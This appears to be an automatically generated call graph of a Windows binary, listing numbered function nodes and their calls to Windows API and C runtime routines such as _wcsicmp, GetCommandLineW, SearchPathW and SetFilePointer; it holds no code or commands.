19159 1ec9d _wcsicmp 19158->19159 19162 1ed47 19158->19162 19161 1ecb3 _wcsicmp 19159->19161 19159->19162 19160 18e9e 439 API calls 19163 1ed6c 19160->19163 19164 1ecc9 _wcsicmp 19161->19164 19165 2ddef GetCommandLineW 19161->19165 19204 19abf 19162->19204 19208 16854 19163->19208 19164->19163 19168 1ecdf _wcsicmp 19164->19168 19165->19157 19167->19160 19169 1ecf1 _wcsicmp 19168->19169 19170 1ed24 19168->19170 19172 1ed07 _wcsicmp 19169->19172 19173 2ddfa rand 19169->19173 19179 19310 19170->19179 19172->19157 19176 2de06 GetNumaHighestNodeNumber 19172->19176 19173->19162 19174 1ed30 19174->19157 19247 26c78 19174->19247 19176->19162 19180 1933b GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19179->19180 19181 2bbbc 19179->19181 19183 2bbd9 19180->19183 19184 1938d 19180->19184 19250 348d7 19181->19250 19201 2bbd1 19183->19201 19256 18791 GetUserDefaultLCID 19183->19256 19186 193cd 19184->19186 19187 2bbcc 19184->19187 19188 19abf _vsnwprintf 19186->19188 19189 19950 444 API calls 19187->19189 19191 193d6 19188->19191 19189->19201 19196 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19191->19196 19193 19abf _vsnwprintf 19193->19201 19194 2bd10 19195 2bc11 19195->19194 19203 2bcd0 memmove 19195->19203 19200 2bdbf 19201->19193 19201->19200 19258 1998d 19201->19258 19203->19195 19205 19acd 19204->19205 19206 19aee 19205->19206 19294 19afb _vsnwprintf 19205->19294 19206->19167 19209 16b0c 19208->19209 19210 1688f GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 19208->19210 19212 348d7 6 API calls 19209->19212 19211 168ec 19210->19211 19222 2a562 19210->19222 19213 18791 GetUserDefaultLCID 19211->19213 19214 2a4c2 19212->19214 19215 16906 GetLocaleInfoW 19213->19215 19214->19174 19235 16915 19215->19235 19216 2a5f9 19220 19abf _vsnwprintf 19216->19220 19217 2a5df realloc 19217->19216 19217->19222 19218 16966 19219 18791 GetUserDefaultLCID 19218->19219 19221 1698e GetDateFormatW 19219->19221 19223 2a62a 19220->19223 19224 16a96 19221->19224 19225 1699d 19221->19225 19222->19216 19222->19217 19226 178e4 437 API calls 19222->19226 19229 2a63e 19223->19229 19240 2a64d 19223->19240 19225->19224 19226->19222 19232 19950 437 API calls 19229->19232 19243 2a649 19232->19243 19235->19218 19235->19235 19237 2a523 memmove 19235->19237 19238 16a75 memmove 19235->19238 19237->19235 19238->19235 19242 19950 437 API calls 19240->19242 19242->19243 19296 26b40 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19247->19296 19249 1ed88 19249->19165 19251 348f0 GetSystemTime 19250->19251 19252 348fc 19250->19252 19253 3493b SystemTimeToFileTime 19251->19253 19252->19253 19254 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19253->19254 19255 2bbc7 19254->19255 19255->19174 19257 187a5 GetLocaleInfoW 19256->19257 19257->19195 19259 199a0 19258->19259 19281 199d0 19258->19281 19260 19a11 6 API calls 19259->19260 19281->19201 19295 19b1f 19294->19295 19295->19206 19296->19249 19298 1a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19297->19298 19299 1a986 19297->19299 19300 1a9d4 5 API calls 19298->19300 19299->19298 19301 1a9c5 19300->19301 19301->18798 20253 1a8e6 20252->20253 20254 1cc70 552 API calls 20253->20254 20255 1a8f8 20254->20255 20256 280ba longjmp 20255->20256 20257 1a90c 20255->20257 20258 280c8 20256->20258 20298 1bab0 20257->20298 20311 1d660 EnterCriticalSection LeaveCriticalSection 20258->20311 20261 280cd 20261->18615 20262 1a911 20262->18615 20264 1cc7a 20263->20264 20265 1cf10 551 API calls 20264->20265 20266 1cc8a 20265->20266 20267 2d434 longjmp 20266->20267 20268 1cc9b 20266->20268 20267->20268 20269 19950 451 API calls 20268->20269 20271 1ccc4 20268->20271 20270 2d45b 20269->20270 20271->18619 20273 38996 20272->20273 20274 3898e 20272->20274 20275 389b2 20273->20275 20276 389a2 20273->20276 20277 389db 20274->20277 20278 389ce longjmp 20274->20278 20275->20274 20280 178e4 451 API calls 20275->20280 20279 178e4 451 API calls 20276->20279 20277->18614 20278->20277 20279->20274 20280->20274 20288 387a0 20281->20288 20282 38900 20284 19950 451 API calls 20282->20284 20283 38930 20287 19950 451 API calls 20283->20287 20286 3890f 20284->20286 20291 19950 451 API calls 20286->20291 20294 38925 20286->20294 20295 3892e 20287->20295 20288->20282 20288->20283 20289 388be 20288->20289 20290 19950 451 API calls 20288->20290 20293 388d2 20288->20293 20288->20295 20297 38791 451 API calls 20288->20297 20289->20282 20296 388c3 20289->20296 20290->20288 20291->20294 20876 386e6 20293->20876 20869 3871d 20294->20869 20295->18617 20296->20283 20296->20293 20297->20288 20299 1bac2 20298->20299 20306 1bb19 20298->20306 20300 1baf3 20299->20300 20301 1badc _wcsicmp 20299->20301 20304 1bb56 20300->20304 20396 1ccd0 20300->20396 20301->20300 20303 1bb68 20301->20303 20303->20300 20307 1cc70 552 API calls 20303->20307 20304->20262 20305 1bb15 20305->20262 20306->20299 20308 1cc70 552 API calls 20306->20308 20309 1bb48 20306->20309 20307->20303 20308->20306 20309->20304 20310 1cc70 552 API calls 20309->20310 20310->20299 20313 1d6b0 20311->20313 20312 2d587 20314 2d59b 20312->20314 20316 163bd 451 API calls 20312->20316 20313->20312 20315 1d6c6 EnterCriticalSection LeaveCriticalSection 20313->20315 20320 1d971 20313->20320 20712 3769e 20314->20712 20318 1d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20315->20318 20319 2d5a8 20315->20319 20316->20314 20323 1d752 20318->20323 20745 39fcf _get_osfhandle GetFileType 20319->20745 20320->20320 20690 1da30 20320->20690 20326 1d774 20323->20326 20327 2d742 memcmp 20323->20327 20347 1d81c 20323->20347 20324 2d5be 20330 1dd98 6 API calls 20324->20330 20345 2d6bd 20324->20345 20325 1d980 20325->20261 20331 1d7b2 20326->20331 20335 2d78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20326->20335 20339 1d7bd SetFilePointer 20326->20339 20327->20326 20328 2d6c6 _get_osfhandle 20332 345f9 10 API calls 20328->20332 20329 1d9f7 GetLastError 20338 1d82c 20329->20338 20333 2d5cd 20330->20333 20341 2d7e9 20331->20341 20342 1d7ec MultiByteToWideChar 20331->20342 20344 1d809 20331->20344 20332->20345 20334 2d5de 20333->20334 20333->20345 20334->20318 20337 1dd98 6 API calls 20334->20337 20335->20331 20335->20344 20336 2d6ef GetLastError 20336->20323 20336->20345 20343 2d5f2 20337->20343 20350 1dd98 6 API calls 20338->20350 20366 1d840 20338->20366 20339->20331 20346 2d7f0 EnterCriticalSection LeaveCriticalSection longjmp 20341->20346 20342->20344 20348 2d6b3 20343->20348 20351 2d607 20343->20351 20344->20346 20344->20347 20345->20323 20345->20328 20345->20336 20345->20338 20346->20338 20347->20329 20347->20338 20348->20318 20349 1d893 20349->20261 20352 2d826 20350->20352 20353 2d610 20351->20353 20354 2d61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20351->20354 20357 39922 451 API calls 20352->20357 20352->20366 20746 37613 _get_osfhandle 20353->20746 20356 34191 451 API calls 20354->20356 20358 2d665 20356->20358 20359 2d84f longjmp 20357->20359 20358->20329 20360 2d66d 20358->20360 20359->20366 20360->20338 20363 2d677 GetLastError 20360->20363 20361 1d8d7 wcschr 20362 1d8f6 20361->20362 20361->20366 20370 1d9e3 20362->20370 20372 1d904 20362->20372 20364 2d689 20363->20364 20365 2d69e 20363->20365 20367 19950 451 API calls 20364->20367 20368 19950 451 API calls 20365->20368 20366->20349 20366->20361 20366->20362 20371 2d68e longjmp 20367->20371 20368->20338 20369 2d908 20369->20261 20370->20320 20377 1d9eb 20370->20377 20371->20365 20372->20369 20374 1dd98 6 API calls 20372->20374 20373 2d8d3 20375 178e4 451 API calls 20373->20375 20378 1d945 20374->20378 20379 2d8df 20375->20379 20376 2d8af 20381 178e4 451 API calls 20376->20381 20377->20373 20377->20376 20380 3769e 462 API calls 20377->20380 20378->20320 20382 1d949 _get_osfhandle SetFilePointer 20378->20382 20383 2d8fb longjmp 20379->20383 20386 1dd98 6 API calls 20379->20386 20384 2d898 20380->20384 20385 2d8be 20381->20385 20382->20320 20393 2d915 20382->20393 20383->20369 20387 19950 451 API calls 20384->20387 20388 39922 451 API calls 20385->20388 20389 2d8f2 20386->20389 20390 2d8a2 20387->20390 20391 2d8c6 longjmp 20388->20391 20389->20383 20751 3a0da 20389->20751 20392 19950 451 API calls 20390->20392 20391->20373 20392->20376 20393->20320 20395 1998d 451 API calls 20393->20395 20395->20320 20397 1cd14 20396->20397 20398 1cce9 20396->20398 20439 1de30 20397->20439 20400 1ccf5 20398->20400 20401 1cde8 20398->20401 20403 1cd01 20400->20403 20404 1cdf2 20400->20404 20510 1e090 20401->20510 20407 1cd12 20403->20407 20436 1e230 20403->20436 20513 1e210 20404->20513 20405 1cddd 20405->20305 20407->20405 20455 1cf10 _setjmp3 20407->20455 20410 1cd48 20411 1cd59 20410->20411 20412 2d478 longjmp 20410->20412 20413 2d48f 20411->20413 20419 1cd85 20411->20419 20412->20413 20414 19950 451 API calls 20413->20414 20415 2d49f 20414->20415 20416 39922 451 API calls 20415->20416 20418 2d4ac longjmp 20416->20418 20417 1ce4a 20423 1cc70 552 API calls 20417->20423 20427 1ce61 20417->20427 20431 1ce6c 20417->20431 20421 2d4ba 20418->20421 20419->20417 20420 1cdd2 20419->20420 20422 1cf10 551 API calls 20420->20422 20424 19950 451 API calls 20421->20424 20422->20405 20423->20417 20426 2d4ca 20424->20426 20425 1dcd0 451 API calls 20428 1ce89 20425->20428 20426->20305 20429 1cf10 551 API calls 20427->20429 20428->20415 20430 1ce93 20428->20430 20429->20431 20432 1cc70 552 API calls 20430->20432 20431->20405 20431->20425 20433 1ceac 20432->20433 20434 1bab0 578 API calls 20433->20434 20435 1cec6 20433->20435 20434->20435 20435->20305 20437 1ccd0 580 API calls 20436->20437 20438 1e247 20437->20438 20438->20407 20516 1ded0 20439->20516 20441 1de4a 20442 1de52 20441->20442 20443 2da16 20441->20443 20534 1e0b0 20442->20534 20445 1cc70 552 API calls 20443->20445 20448 1de57 20445->20448 20446 1de64 20447 1cc70 552 API calls 20446->20447 20453 1de92 20446->20453 20449 1de75 20447->20449 20448->20446 20451 38959 452 API calls 20448->20451 20450 1ded0 558 API calls 20449->20450 20452 1de80 20450->20452 20451->20446 20452->20453 20454 1cf10 551 API calls 20452->20454 20453->20407 20454->20453 20456 2d56e 20455->20456 20460 1cf38 20455->20460 20457 1d03b 20458 1d048 20457->20458 20461 19950 451 API calls 20457->20461 20458->20410 20459 1cf9e 20463 1d600 536 API calls 20459->20463 20460->20456 20460->20457 20460->20459 20468 1cf86 wcschr 20460->20468 20499 1d0fa 20460->20499 20685 1d600 20460->20685 20464 2d4ca 20461->20464 20466 1cfb7 20463->20466 20464->20410 20465 1cf67 iswspace 20465->20460 20467 2d4d2 20466->20467 20470 1cfc7 20466->20470 20469 1d600 536 API calls 20467->20469 20467->20499 20468->20459 20468->20460 20471 2d4ea 20469->20471 20472 1cfe2 iswdigit 20470->20472 20473 1d0a6 20470->20473 20480 1d4a7 20470->20480 20470->20499 20486 1d600 536 API calls 20471->20486 20476 1cfff 20472->20476 20477 1d341 20472->20477 20473->20477 20482 1d0b5 iswspace 20473->20482 20483 1d0e8 iswdigit 20473->20483 20474 1d218 20474->20410 20475 1d600 536 API calls 20475->20499 20481 1d600 536 API calls 20476->20481 20498 1d027 20476->20498 20477->20472 20478 1d600 536 API calls 20477->20478 20477->20499 20478->20477 20479 1d190 20479->20474 20485 178e4 451 API calls 20479->20485 20484 1d600 536 API calls 20480->20484 20489 1d2a5 20481->20489 20482->20472 20487 1d0c7 20482->20487 20488 1d310 20483->20488 20483->20499 20495 1d4ac 20484->20495 20485->20456 20486->20477 20490 1d0d0 wcschr 20487->20490 20487->20499 20488->20477 20491 1d328 iswspace 20488->20491 20496 1d600 536 API calls 20489->20496 20505 1d2ae 20489->20505 20490->20472 20490->20483 20491->20477 20492 1d484 20491->20492 20497 1a62f wcschr 20492->20497 20493 1d1b4 iswspace 20493->20479 20493->20499 20494 1d16d iswdigit 20494->20499 20495->20457 20495->20471 20495->20472 20495->20499 20496->20505 20497->20477 20498->20410 20499->20475 20499->20476 20499->20479 20499->20493 20499->20494 20500 1d23e iswspace 20499->20500 20502 1d1d1 wcschr 20499->20502 20500->20499 20501 1d253 wcschr 20500->20501 20501->20499 20502->20479 20502->20494 20503 1d600 536 API calls 20504 1d405 iswspace 20503->20504 20504->20505 20505->20498 20505->20503 20506 1a62f wcschr 20505->20506 20507 1d426 iswdigit 20505->20507 20506->20505 20507->20498 20508 1d438 20507->20508 20509 1d600 536 API calls 20508->20509 20509->20498 20511 1ccd0 580 API calls 20510->20511 20512 1e0a7 20511->20512 20512->20407 20514 1ccd0 580 API calls 20513->20514 20515 1e227 20514->20515 20515->20407 20520 1df00 20516->20520 20517 1df16 iswdigit 20519 1df27 20517->20519 20517->20520 20518 1dcd0 451 API calls 20518->20520 20521 1df2f 20519->20521 20525 1cf10 551 API calls 20519->20525 20520->20517 20520->20518 20520->20519 20522 1df63 iswdigit 20520->20522 20523 2daf9 longjmp 20520->20523 20524 1e26b 20520->20524 20526 2daec 20520->20526 20530 1e059 iswdigit 20520->20530 20531 38959 452 API calls 20520->20531 20532 1acb0 451 API calls 20520->20532 20533 1cc70 552 API calls 20520->20533 20608 1a931 20520->20608 20521->20441 20522->20520 20523->20524 20524->20441 20525->20521 20527 38959 452 API calls 20526->20527 20529 2daf1 20527->20529 20529->20523 20530->20520 20531->20520 20532->20520 20533->20520 20535 1e0c1 _wcsicmp 20534->20535 20536 1e15b 20534->20536 20537 1e203 _wcsicmp 20535->20537 20538 1e0dc _wcsicmp 20535->20538 20540 1dcd0 451 API calls 20536->20540 20541 1e1db 20536->20541 20544 22a35 20537->20544 20591 22a63 20537->20591 20538->20537 20542 1e0f7 _wcsicmp 20538->20542 20545 1e17d 20540->20545 20546 38959 452 API calls 20541->20546 20566 1e1e0 20541->20566 20542->20536 20543 1e112 _wcsicmp 20542->20543 20543->20536 20547 1e12d _wcsicmp 20543->20547 20627 1bb90 20544->20627 20549 29ca7 20545->20549 20563 1e187 20545->20563 20550 1e1f5 20546->20550 20547->20536 20551 1e144 _wcsicmp 20547->20551 20554 39922 451 API calls 20549->20554 20550->20448 20551->20536 20552 22a47 20558 1cc70 552 API calls 20552->20558 20552->20591 20553 1e1bf 20557 1a8c4 566 API calls 20553->20557 20555 29cac longjmp 20554->20555 20556 15e22 20555->20556 20560 29cc3 20556->20560 20565 15da6 451 API calls 20556->20565 20561 1e1c9 20557->20561 20562 22a5b 20558->20562 20559 1cc70 552 API calls 20559->20563 20560->20448 20561->20566 20570 1cc70 552 API calls 20561->20570 20644 19907 20562->20644 20563->20553 20563->20559 20564 1e1b4 20563->20564 20568 1cf10 551 API calls 20564->20568 20569 15e31 20565->20569 20566->20448 20568->20553 20571 18f21 451 API calls 20569->20571 20570->20541 20572 15e3a 20571->20572 20577 15e1d 20572->20577 20585 38c50 451 API calls 20572->20585 20573 22ae4 20575 2f500 20573->20575 20576 22af4 iswspace 20573->20576 20574 22a7c _wcsicmp 20578 22a92 _wcsicmp 20574->20578 20574->20591 20580 38959 452 API calls 20575->20580 20576->20575 20579 22b0b 20576->20579 20577->20448 20581 22aa8 _wcsicmp 20578->20581 20578->20591 20584 1a62f wcschr 20579->20584 20586 22b81 20580->20586 20587 22abe _wcsicmp 20581->20587 20581->20591 20582 1dcd0 451 API calls 20582->20591 20583 1cc70 552 API calls 20583->20591 20588 22b1f 20584->20588 20597 15e68 20585->20597 20590 38959 452 API calls 20586->20590 20607 22b8c 20586->20607 20587->20591 20596 22ad7 20587->20596 20588->20575 20593 22b34 20588->20593 20589 2f4d2 20592 39922 451 API calls 20589->20592 20594 2f50f 20590->20594 20591->20573 20591->20574 20591->20582 20591->20583 20591->20589 20599 38959 452 API calls 20591->20599 20595 2f4d7 longjmp 20592->20595 20651 22c23 20593->20651 20594->20594 20595->20596 20596->20573 20601 38959 452 API calls 20596->20601 20597->20448 20599->20591 20600 22b4b 20655 233ca 20600->20655 20601->20573 20607->20448 20609 1cc70 552 API calls 20608->20609 20610 1a93b 20609->20610 20611 1a942 20610->20611 20613 38959 452 API calls 20610->20613 20612 1dcd0 451 API calls 20611->20612 20614 1a94f 20611->20614 20612->20614 20613->20611 20615 1a959 20614->20615 20616 39922 451 API calls 20614->20616 20615->20520 20617 29cac longjmp 20616->20617 20618 15e22 20617->20618 20619 29cc3 20618->20619 20620 15da6 451 API calls 20618->20620 20619->20520 20621 15e31 20620->20621 20622 18f21 451 API calls 20621->20622 20623 15e3a 20622->20623 20624 15e1d 20623->20624 20625 38c50 451 API calls 20623->20625 20624->20520 20626 15e68 20625->20626 20626->20520 20628 1dcd0 451 API calls 20627->20628 20629 1bba1 20628->20629 20630 1dcd0 451 API calls 20629->20630 20635 1bbc1 20629->20635 20630->20635 20631 39922 451 API calls 20632 29cac longjmp 20631->20632 20633 15e22 20632->20633 20634 29cc3 20633->20634 20636 15da6 451 API calls 20633->20636 20634->20552 20635->20631 20638 1bbde 20635->20638 20637 15e31 20636->20637 20639 18f21 451 API calls 20637->20639 20638->20552 20640 15e3a 20639->20640 20641 15e1d 20640->20641 20642 38c50 451 API calls 20640->20642 20641->20552 20643 15e68 20642->20643 20643->20552 20645 1bc30 451 API calls 20644->20645 20646 19938 20645->20646 20675 1a800 20646->20675 20649 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20650 1994e 20649->20650 20650->20591 20652 1cc70 552 API calls 20651->20652 20653 22c2f _wcsicmp 20652->20653 20654 22c41 20653->20654 20654->20600 20656 1cc70 552 API calls 20655->20656 20657 233e2 20656->20657 20658 2f776 20657->20658 20668 233eb 20657->20668 20659 38959 452 API calls 20658->20659 20660 2f77b 20659->20660 20661 1cc70 552 API calls 20661->20668 20663 23457 20666 1dcd0 451 API calls 20666->20668 20667 1dd20 451 API calls 20667->20668 20668->20660 20668->20661 20668->20663 20668->20666 20668->20667 20669 2f78c 20668->20669 20676 19943 20675->20676 20677 1a82f 20675->20677 20676->20649 20677->20676 20678 39a0e 452 API calls 20677->20678 20679 2c971 20678->20679 20679->20676 20680 163bd 451 API calls 20679->20680 20682 2c982 20680->20682 20682->20676 20686 1d613 20685->20686 20687 1d660 536 API calls 20686->20687 20689 1d627 20686->20689 20688 280cd 20687->20688 20688->20465 20689->20465 20691 1dcd0 451 API calls 20690->20691 20692 1da45 20691->20692 20693 2d948 memset longjmp 20692->20693 20707 1da52 20692->20707 20694 1da81 20693->20694 20694->20325 20695 1dad3 20696 1daf1 20695->20696 20697 2d9ad 20695->20697 20698 1dc60 2 API calls 20696->20698 20700 178e4 451 API calls 20697->20700 20699 1daf6 20698->20699 20699->20325 20701 2d9a8 20700->20701 20704 1dc60 2 API calls 20701->20704 20705 2d9cc longjmp 20704->20705 20706 2d9da 20705->20706 20708 178e4 451 API calls 20706->20708 20707->20694 20707->20695 20707->20697 20710 2d97b memcpy 20707->20710 20759 1ee03 20707->20759 20810 1bf70 20707->20810 20709 2d9e3 20708->20709 20709->20325 20711 178e4 451 API calls 20710->20711 20711->20701 20713 37728 20712->20713 20714 376fd 20712->20714 20716 37d26 20713->20716 20719 37746 20713->20719 20721 19950 451 API calls 20713->20721 20715 163bd 451 API calls 20714->20715 20718 37708 EnterCriticalSection LeaveCriticalSection 20715->20718 20717 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20716->20717 20720 37d3d 20717->20720 20718->20713 20722 1ec2e 451 API calls 20719->20722 20723 37750 20719->20723 20720->20319 20721->20719 20722->20723 20724 18e9e 451 API calls 20723->20724 20725 377ad 20724->20725 20864 37654 20725->20864 20728 37c99 20729 19abf _vsnwprintf 20728->20729 20730 37cba 20729->20730 20732 1998d 451 API calls 20730->20732 20731 378b8 towupper 20741 377fa 20731->20741 20733 37cfe 20732->20733 20733->20716 20734 37d07 EnterCriticalSection LeaveCriticalSection 20733->20734 20734->20716 20735 19310 451 API calls 20735->20741 20736 16854 451 API calls 20736->20741 20737 19abf _vsnwprintf 20737->20741 20738 14d08 5 API calls 20738->20741 20739 37afc GetDriveTypeW 20739->20741 20741->20730 20741->20731 20741->20735 20741->20736 20741->20737 20741->20738 20741->20739 20742 272ef ApiSetQueryApiSetPresence 20741->20742 20743 19abf _vsnwprintf 20741->20743 20868 2640a FormatMessageW 20741->20868 20742->20741 20744 379ed LocalFree 20743->20744 20744->20741 20745->20324 20747 34799 451 API calls 20746->20747 20748 3763c 20747->20748 20749 37649 GetLastError 20748->20749 20750 37645 20748->20750 20749->20750 20750->20338 20752 3a0ef GetStdHandle 20751->20752 20753 34799 451 API calls 20752->20753 20754 3a110 20753->20754 20755 3a114 wcschr 20754->20755 20756 3a129 20754->20756 20755->20752 20755->20756 20757 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20756->20757 20758 3a133 20757->20758 20758->20383 20760 1ee52 20759->20760 20761 1ee4c 20759->20761 20762 1ee5a wcsrchr 20760->20762 20765 1ee68 20760->20765 20761->20760 20763 1eea7 20761->20763 20762->20765 20766 21a05 5 API calls 20763->20766 20769 2de31 20763->20769 20764 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20768 1ee88 20764->20768 20765->20764 20798 1eed8 20766->20798 20767 2df50 longjmp 20767->20769 20768->20707 20769->20765 20769->20767 20770 2de49 ??_V@YAXPAX 20769->20770 20781 2decb 20769->20781 20770->20765 20771 1ef09 towlower wcsrchr 20774 1f1dd wcsrchr 20771->20774 20771->20798 20772 1ef50 wcsrchr 20775 1ef67 wcsrchr 20772->20775 20772->20798 20773 2de80 wcschr 20776 2df01 20773->20776 20777 2de9e 20773->20777 20778 1f1f7 towlower 20774->20778 20774->20798 20775->20776 20775->20798 20776->20770 20780 178e4 451 API calls 20776->20780 20779 1dcd0 451 API calls 20777->20779 20778->20798 20784 2deb5 20779->20784 20780->20769 20781->20770 20782 1acb0 451 API calls 20782->20798 20783 1efed 20783->20765 20785 1efef ??_V@YAXPAX 20783->20785 20784->20769 20833 21d90 20784->20833 20785->20765 20787 1efe6 20790 1acb0 451 API calls 20787->20790 20788 1f009 GetFullPathNameW 20788->20798 20790->20783 20791 1dc60 2 API calls 20791->20776 20792 2df72 SearchPathW 20792->20798 20793 20207 10 API calls 20794 1f03d wcsrchr 20793->20794 20795 2dfb9 wcsrchr 20794->20795 20794->20798 20795->20798 20796 1f067 memset 20797 1e3f0 17 API calls 20796->20797 20797->20798 20798->20769 20798->20770 20798->20771 20798->20772 20798->20773 20798->20776 20798->20782 20798->20783 20798->20787 20798->20788 20798->20792 20798->20793 20798->20795 20798->20796 20799 2dff6 GetFileAttributesExW 20798->20799 20800 1f18a 20798->20800 20801 2e07c FileTimeToSystemTime 20798->20801 20806 16854 451 API calls 20798->20806 20808 1f164 wcsrchr 20798->20808 20809 19310 451 API calls 20798->20809 20846 3b325 20798->20846 20799->20798 20802 1acb0 451 API calls 20800->20802 20805 2e271 20800->20805 20801->20798 20803 1f1ba 20802->20803 20803->20783 20804 1f1c8 ??_V@YAXPAX 20803->20804 20804->20783 20806->20798 20808->20798 20808->20805 20809->20798 20811 1dcd0 451 API calls 20810->20811 20814 1bfc8 20811->20814 20812 2cfad longjmp 20820 1c02c 20812->20820 20813 2cfc1 longjmp 20813->20820 20815 1dcd0 451 API calls 20814->20815 20814->20820 20830 1c155 20814->20830 20815->20820 20816 1ec2e 451 API calls 20816->20820 20819 1c1ef wcstol 20819->20820 20820->20812 20820->20813 20820->20816 20820->20819 20821 1c111 20820->20821 20829 1c26d 20820->20829 20820->20830 20832 1c0bf 20820->20832 20824 2d029 20821->20824 20821->20830 20822 2d042 memcpy 20826 2d063 20822->20826 20823 1c333 memcpy 20827 1c1b2 _wcsnicmp 20823->20827 20825 178e4 451 API calls 20824->20825 20828 2d036 longjmp 20825->20828 20827->20830 20828->20822 20829->20830 20831 1c27d wcstol 20829->20831 20830->20822 20830->20823 20830->20827 20830->20832 20831->20830 20859 1c3f4 20832->20859 20834 21e5a 20833->20834 20835 21da8 20833->20835 20834->20791 20835->20834 20854 1ab7f 20835->20854 20838 1acb0 451 API calls 20839 21dc2 20838->20839 20840 201f5 wcsrchr 20839->20840 20845 21dd1 20840->20845 20841 2f106 20842 21e4a 20843 1dc60 2 API calls 20842->20843 20843->20834 20844 21e11 _wcsnicmp 20844->20845 20845->20841 20845->20842 20845->20844 20845->20845 20849 3b35b __aulldvrm 20846->20849 20847 3b42e 20848 3b445 wcsncmp 20847->20848 20851 3b432 20847->20851 20848->20851 20849->20847 20850 3b3f4 memmove 20849->20850 20850->20849 20852 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20851->20852 20853 3b4f8 20852->20853 20853->20798 20855 1abaa 20854->20855 20858 1ab88 20854->20858 20855->20838 20856 1ab89 iswspace 20857 1ab98 wcschr 20856->20857 20856->20858 20857->20855 20857->20858 20858->20855 20858->20856 20858->20857 20860 1dc60 2 API calls 20859->20860 20861 1c3fb 20860->20861 20862 1dc60 2 API calls 20861->20862 20863 1c0df 20862->20863 20863->20707 20865 37660 20864->20865 20867 37679 20864->20867 20866 26e25 4 API calls 20865->20866 20866->20867 20867->20716 20867->20728 20867->20741 20868->20741 20870 38727 20869->20870 20875 38781 20869->20875 20871 1998d 451 API calls 20870->20871 20873 38736 20871->20873 20872 19950 451 API calls 20872->20873 20873->20872 20874 1998d 451 API calls 20873->20874 20873->20875 20874->20873 20877 19950 451 API calls 20876->20877 20878 386f9 20877->20878 20879 3871d 451 API calls 20878->20879 20880 38702 20879->20880 20881 38791 451 API calls 20880->20881 20882 3870d 20881->20882 20883 38791 451 API calls 20882->20883 20884 38718 20883->20884 20884->20295 20886 1adc6 20885->20886 20892 2cc3f 20885->20892 20887 25a2e memset 20886->20887 20889 1add1 20887->20889 20888 2cc6a GetLastError 20888->20892 20891 1e3f0 17 API calls 20889->20891 20889->20892 20890 178e4 451 API calls 20890->20892 20893 1adef 20891->20893 20892->20888 20892->20890 20894 261e6 ??_V@YAXPAX 20892->20894 20893->20892 20895 1ae05 20893->20895 20896 1b0b9 20893->20896 20894->20892 21152 1e950 memset 20895->21152 20898 20b12 5 API calls 20896->20898 20900 1b0c1 20898->20900 20900->20892 21134 17f47 memset 20900->21134 20901 1ae23 20901->20892 20905 2cc7c 20901->20905 20912 1ae44 20901->20912 20902 1b118 21148 221ee 20902->21148 20910 261e6 ??_V@YAXPAX 20905->20910 20907 1b11f 21276 22940 20907->21276 20908 1aea1 20908->20892 20925 1af6b 20908->20925 20930 20b12 5 API calls 20908->20930 20931 1aecb wcschr 20908->20931 20934 1b176 20908->20934 20945 17f47 23 API calls 20908->20945 20954 2ccc9 GetLastError 20908->20954 20909 1b0dc towupper 20911 1b100 20909->20911 20910->20908 20911->20902 20911->20911 20915 2cc75 20911->20915 20912->20908 20914 1bc30 451 API calls 20912->20914 20917 1ae86 20914->20917 20918 39a7d 451 API calls 20915->20918 20916 1afc9 21204 1b17b 20916->21204 20921 1b00e wcsncmp 20917->20921 20923 1ae91 20917->20923 20918->20905 20921->20908 20921->20923 20922 261e6 ??_V@YAXPAX 20927 1afe8 20922->20927 20923->20908 20924 1a800 452 API calls 20923->20924 20924->20908 21179 1b1b0 20925->21179 20929 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20927->20929 20933 1b002 20929->20933 20930->20908 20931->20908 20950 1b033 20931->20950 20932 1af83 20936 1afc4 20932->20936 20937 1af99 20932->20937 20933->18654 20944 178e4 451 API calls 20934->20944 21198 1aa50 20936->21198 20938 1afa5 20937->20938 20939 1b02c 20937->20939 20941 1afb1 20938->20941 20942 1b085 20938->20942 21208 1c6c0 20939->21208 20947 1b0a2 20941->20947 20948 1afbd 20941->20948 21261 19dc0 20942->21261 20949 2cce0 20944->20949 20945->20908 20947->20907 20952 1afc2 20947->20952 21195 19770 20948->21195 20949->20892 20950->20942 20951 1b193 20950->20951 20955 26c78 4 API calls 20951->20955 20952->20916 20954->20934 20955->20934 20957 1e683 20956->20957 20958 1e6c6 20956->20958 20957->20958 20959 1e689 20957->20959 20962 1e71d 20957->20962 20963 1e6ec 20957->20963 20968 1e733 20957->20968 20958->18623 22058 1e790 20959->22058 20967 1e790 460 API calls 20962->20967 20963->20958 20966 1e790 460 API calls 20963->20966 20964 1e790 460 API calls 20969 1e6ad 20964->20969 20965 1e790 460 API calls 20965->20958 20966->20963 20967->20968 20968->20958 20968->20965 20969->20958 20970 1e790 460 API calls 20969->20970 20970->20969 20973 203cb 20971->20973 20972 203e1 20974 203f3 20972->20974 20975 20416 20972->20975 20973->20972 20976 2e7bf iswdigit 20973->20976 22072 215f0 20974->22072 20981 203f8 20975->20981 22076 22960 wcstol wcstol 20975->22076 20976->20973 20977 2e7e2 20976->20977 20980 178e4 451 API calls 20977->20980 20982 2040d 20980->20982 20983 1e470 908 API calls 20981->20983 20982->18654 20983->20982 20985 1e470 909 API calls 20984->20985 20986 1ab63 20985->20986 20987 1ab76 